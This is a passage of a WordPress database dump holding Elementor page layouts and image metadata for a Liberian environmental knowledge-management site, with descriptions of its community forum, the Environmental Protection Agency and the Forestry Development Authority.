style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18482,2710,'_elementor_controls_usage','a:0:{}'),(18484,2710,'_ca_post_type','2704'),(18485,2709,'_edit_last','1'),(18486,2709,'_elementor_controls_usage','a:0:{}'),(18487,2709,'_ca_handle','0'),(18488,2709,'_ca_host','sidebar'),(18489,2709,'_ca_merge_pos','0'),(18490,2709,'_edit_lock','1574524916:1'),(18491,2711,'_wp_attached_file','2019/11/mfdp_logo.jpg'),(18492,2711,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:225;s:6:\"height\";i:225;s:4:\"file\";s:21:\"2019/11/mfdp_logo.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"mfdp_logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18507,2714,'_elementor_edit_mode','builder'),(18508,2714,'_elementor_template_type','wp-page'),(18509,2714,'_elementor_version','2.7.5'),(18510,2714,'_wp_page_template','default'),(18511,2714,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.<\\/p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.<\\/p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong><span style=\\\"color: #ff6600;\\\">Please note that any inappropriate contents including topics\\/questions\\/comments\\/images\\/videos posted on the community forum, will be removed by the forum moderators.<\\/span><\\/strong><\\/p><p>If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Request to Join Us<\\/span>!<\\/a><\\/p><p><strong>Added Tools to the Community:<\\/strong><\\/p><p>Members Chat (Activated)<\\/p><p>Group Chatting (Activated)<\\/p><p>Group online meetings hosting or Video Conferencing (In Progress)<\\/p><p>Events Setup (Activated)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(18514,2715,'_wp_attached_file','2019/11/featured_epa_page.jpg'),(18515,2715,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:29:\"2019/11/featured_epa_page.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"featured_epa_page-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"featured_epa_page-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"featured_epa_page-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P530\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1548616719\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"16.1\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18516,2716,'_elementor_edit_mode','builder'),(18517,2716,'_elementor_template_type','wp-post'),(18518,2716,'_elementor_version','2.7.5'),(18519,2716,'_wp_page_template','default'),(18520,2716,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18521,2716,'_thumbnail_id','2715'),(18522,2716,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18524,2717,'_wp_attached_file','2019/11/featured_fda0.jpg'),(18525,2717,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2019/11/featured_fda0.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"featured_fda0-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"featured_fda0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"featured_fda0-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:4:\"X500\";s:7:\"caption\";s:20:\"GEDSC DIGITAL CAMERA\";s:17:\"created_timestamp\";s:10:\"1373877362\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"11.2\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:17:\"0.029411764705882\";s:5:\"title\";s:20:\"GEDSC DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18526,1586,'_thumbnail_id','2717'),(18527,2718,'_elementor_edit_mode','builder'),(18528,2718,'_elementor_template_type','wp-post'),(18529,2718,'_elementor_version','2.7.5'),(18530,2718,'_wp_page_template','default'),(18531,2718,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3dbc9ac\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f919375\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1d953c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15781ca\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"fda\\\",\\\"tag_id\\\":\\\"53\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"fda\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f10ae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7e78c45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1160609\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\